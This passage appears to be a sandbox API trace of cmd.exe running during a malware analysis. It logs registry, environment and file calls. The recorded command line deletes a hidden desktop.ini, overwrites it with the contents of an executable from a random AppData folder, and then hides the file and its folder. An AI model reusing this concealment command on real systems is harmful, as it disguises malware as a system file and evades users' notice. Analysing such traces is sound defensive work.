lpType=0x12e924*=0x4, lpData=0x12e928*=0x40, lpcbData=0x12e920*=0x4) returned 0x0 [0132.657] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e924, lpData=0x12e928, lpcbData=0x12e920*=0x1000 | out: lpType=0x12e924*=0x0, lpData=0x12e928*=0x40, lpcbData=0x12e920*=0x1000) returned 0x2 [0132.657] RegCloseKey (hKey=0x40) returned 0x0 [0132.657] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e91c | out: phkResult=0x12e91c*=0x40) returned 0x0 [0132.657] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e924, lpData=0x12e928, lpcbData=0x12e920*=0x1000 | out: lpType=0x12e924*=0x0, lpData=0x12e928*=0x40, lpcbData=0x12e920*=0x1000) returned 0x2 [0132.657] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e924, lpData=0x12e928, lpcbData=0x12e920*=0x1000 | out: lpType=0x12e924*=0x4, lpData=0x12e928*=0x1, lpcbData=0x12e920*=0x4) returned 0x0 [0132.657] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e924, lpData=0x12e928, lpcbData=0x12e920*=0x1000 | out: lpType=0x12e924*=0x0, lpData=0x12e928*=0x1, lpcbData=0x12e920*=0x1000) returned 0x2 [0132.657] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e924, lpData=0x12e928, lpcbData=0x12e920*=0x1000 | out: lpType=0x12e924*=0x4, lpData=0x12e928*=0x0, lpcbData=0x12e920*=0x4) returned 0x0 [0132.657] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e924, lpData=0x12e928, lpcbData=0x12e920*=0x1000 | out: lpType=0x12e924*=0x4, lpData=0x12e928*=0x9, lpcbData=0x12e920*=0x4) returned 0x0 [0132.657] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e924, lpData=0x12e928, lpcbData=0x12e920*=0x1000 | out: lpType=0x12e924*=0x4, lpData=0x12e928*=0x9, lpcbData=0x12e920*=0x4) returned 0x0 [0132.657] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e924, lpData=0x12e928, lpcbData=0x12e920*=0x1000 | out: lpType=0x12e924*=0x0, lpData=0x12e928*=0x9, lpcbData=0x12e920*=0x1000) returned 0x2 [0132.657] RegCloseKey (hKey=0x40) returned 0x0 [0132.657] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886367 [0132.657] srand (_Seed=0x5b886367) [0132.657] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\"" [0132.657] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\"" [0132.657] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0132.658] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1c1be0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0132.658] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0132.658] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0132.658] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0132.658] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0132.658] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0132.658] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0132.658] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0132.658] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0132.658] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0132.658] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0132.658] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0132.658] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0132.658] GetEnvironmentStringsW () returned 0x1c25d0* [0132.658] FreeEnvironmentStringsW (penv=0x1c25d0) returned 1 [0132.658] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.658] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0132.658] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0132.658] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0132.658] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0132.658] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0132.658] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0132.658] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0132.659] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0132.659] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0132.659] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f6e8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0132.659] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f6e8, lpFilePart=0x12f6e4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f6e4*="Desktop") returned 0x18 [0132.659] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0132.659] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f464 | out: lpFindFileData=0x12f464) returned 0x1c0c60 [0132.659] FindClose (in: hFindFile=0x1c0c60 | out: hFindFile=0x1c0c60) returned 1 [0132.659] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f464 | out: lpFindFileData=0x12f464) returned 0x1c0c60 [0132.659] FindClose (in: hFindFile=0x1c0c60 | out: hFindFile=0x1c0c60) returned 1 [0132.659] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f464 | out: lpFindFileData=0x12f464) returned 0x1c0c60 [0132.659] FindClose (in: hFindFile=0x1c0c60 | out: hFindFile=0x1c0c60) returned 1 [0132.659] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0132.659] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0132.659] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0132.659] GetEnvironmentStringsW () returned 0x1c0480* [0132.660] FreeEnvironmentStringsW (penv=0x1c0480) returned 1 [0132.660] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0132.660] GetConsoleOutputCP () returned 0x1b5 [0132.660] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0132.660] GetUserDefaultLCID () returned 0x409 [0132.660] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0132.660] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f828, cchData=128 | out: lpLCData="0") returned 2 [0132.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f828, cchData=128 | out: lpLCData="0") returned 2 [0132.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f828, cchData=128 | out: lpLCData="1") returned 2 [0132.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0132.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0132.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0132.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0132.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0132.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0132.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0132.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0132.661] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0132.661] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0132.661] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0132.662] GetConsoleTitleW (in: lpConsoleTitle=0x1b0ab8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.662] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0132.662] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0132.662] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0132.662] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0132.663] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0132.663] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0132.663] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0132.663] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0132.663] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0132.663] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0132.663] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0132.665] _wcsicmp (_String1="del", _String2=")") returned 59 [0132.665] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0132.665] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0132.665] _wcsicmp (_String1="IF", _String2="del") returned 5 [0132.665] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0132.665] _wcsicmp (_String1="REM", _String2="del") returned 14 [0132.665] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0132.666] _wcsicmp (_String1="type", _String2=")") returned 75 [0132.666] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0132.666] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0132.666] _wcsicmp (_String1="IF", _String2="type") returned -11 [0132.667] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0132.667] _wcsicmp (_String1="REM", _String2="type") returned -2 [0132.667] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0132.672] SetErrorMode (uMode=0x0) returned 0x0 [0132.672] SetErrorMode (uMode=0x1) returned 0x0 [0132.672] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x1c0488, lpFilePart=0x12efdc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12efdc*="Desktop") returned 0x18 [0132.672] SetErrorMode (uMode=0x0) returned 0x1 [0132.672] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0132.672] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0132.676] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0132.677] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x12ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ed58) returned 0xffffffff [0132.677] GetLastError () returned 0x2 [0132.677] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x12ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ed58) returned 0xffffffff [0132.677] GetLastError () returned 0x2 [0132.677] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x12ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ed58) returned 0x1c2558 [0132.677] FindClose (in: hFindFile=0x1c2558 | out: hFindFile=0x1c2558) returned 1 [0132.678] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x12ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ed58) returned 0xffffffff [0132.678] GetLastError () returned 0x2 [0132.678] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x12ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ed58) returned 0x1c2558 [0132.678] FindClose (in: hFindFile=0x1c2558 | out: hFindFile=0x1c2558) returned 1 [0132.678] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0132.678] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0132.678] GetConsoleTitleW (in: lpConsoleTitle=0x12f250, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.782] InitializeProcThreadAttributeList (in: lpAttributeList=0x12f0d8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12f1a0 | out: lpAttributeList=0x12f0d8, lpSize=0x12f1a0) returned 1 [0132.782] UpdateProcThreadAttribute (in: lpAttributeList=0x12f0d8, dwFlags=0x0, Attribute=0x60001, lpValue=0x12f198, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12f0d8, lpPreviousValue=0x0) returned 1 [0132.782] GetStartupInfoW (in: lpStartupInfo=0x12f094 | out: lpStartupInfo=0x12f094*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0132.782] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0132.783] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12f134*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12f180 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" ", lpProcessInformation=0x12f180*(hProcess=0x50, hThread=0x4c, dwProcessId=0xbf8, dwThreadId=0xc08)) returned 1 [0132.791] CloseHandle (hObject=0x4c) returned 1 [0132.791] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0132.791] GetEnvironmentStringsW () returned 0x1c0930* [0132.791] FreeEnvironmentStringsW (penv=0x1c0930) returned 1 [0132.791] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0132.949] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x12f074 | out: lpExitCode=0x12f074*=0x0) returned 1 [0132.949] CloseHandle (hObject=0x50) returned 1 [0132.950] _vsnwprintf (in: _Buffer=0x12f1bc, _BufferCount=0x13, _Format="%08X", _ArgList=0x12f080 | out: _Buffer="00000000") returned 8 [0132.950] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0132.950] GetEnvironmentStringsW () returned 0x1c25d0* [0132.950] FreeEnvironmentStringsW (penv=0x1c25d0) returned 1 [0132.950] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0132.950] GetEnvironmentStringsW () returned 0x1c25d0* [0132.950] FreeEnvironmentStringsW (penv=0x1c25d0) returned 1 [0132.950] DeleteProcThreadAttributeList (in: lpAttributeList=0x12f0d8 | out: lpAttributeList=0x12f0d8) [0132.950] GetConsoleTitleW (in: lpConsoleTitle=0x12f458, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.950] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x12e4d0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x12e4d4, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x12e4d0*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0132.951] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0132.951] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0132.951] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0132.951] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\desktop.ini")) returned 0xffffffff [0132.951] GetLastError () returned 0x2 [0132.951] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew")) returned 0x10 [0132.951] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0132.951] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0132.951] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\desktop.ini")) returned 0xffffffff [0132.951] GetLastError () returned 0x2 [0132.951] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x1c365c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1c365c) returned 0xffffffff [0132.951] GetLastError () returned 0x2 [0132.951] _get_osfhandle (_FileHandle=2) returned 0xb [0132.951] GetFileType (hFile=0xb) returned 0x2 [0132.952] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0132.952] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12eed0 | out: lpMode=0x12eed0) returned 1 [0132.952] _get_osfhandle (_FileHandle=2) returned 0xb [0132.952] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x12ef04 | out: lpConsoleScreenBufferInfo=0x12ef04) returned 1 [0132.952] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0132.953] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.953] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.953] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.953] GetFileType (hFile=0x7) returned 0x2 [0132.953] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0132.953] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12f5f4 | out: lpMode=0x12f5f4) returned 1 [0132.953] _dup (_FileHandle=1) returned 3 [0132.953] _close (_FileHandle=1) returned 0 [0132.953] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini", _String2="con") returned -53 [0132.953] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x12f5c4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0132.954] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0132.954] GetConsoleTitleW (in: lpConsoleTitle=0x12f3f4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.954] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x12ef58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ef58) returned 0x1c0778 [0132.954] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0132.954] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0132.954] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0132.954] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x12de64, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0132.954] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0132.954] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.954] GetFileType (hFile=0x58) returned 0x1 [0132.954] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.954] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x12debc | out: lpFileSizeHigh=0x12debc*=0x0) returned 0x7d600 [0132.954] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.954] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.954] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.954] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.955] GetFileType (hFile=0x50) returned 0x1 [0132.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.955] GetFileType (hFile=0x50) returned 0x1 [0132.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.955] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.956] GetFileType (hFile=0x50) returned 0x1 [0132.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.956] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.956] GetFileType (hFile=0x50) returned 0x1 [0132.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.956] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.956] GetFileType (hFile=0x50) returned 0x1 [0132.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.956] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.956] GetFileType (hFile=0x50) returned 0x1 [0132.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.956] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.956] GetFileType (hFile=0x50) returned 0x1 [0132.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.956] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.956] GetFileType (hFile=0x50) returned 0x1 [0132.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.956] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, 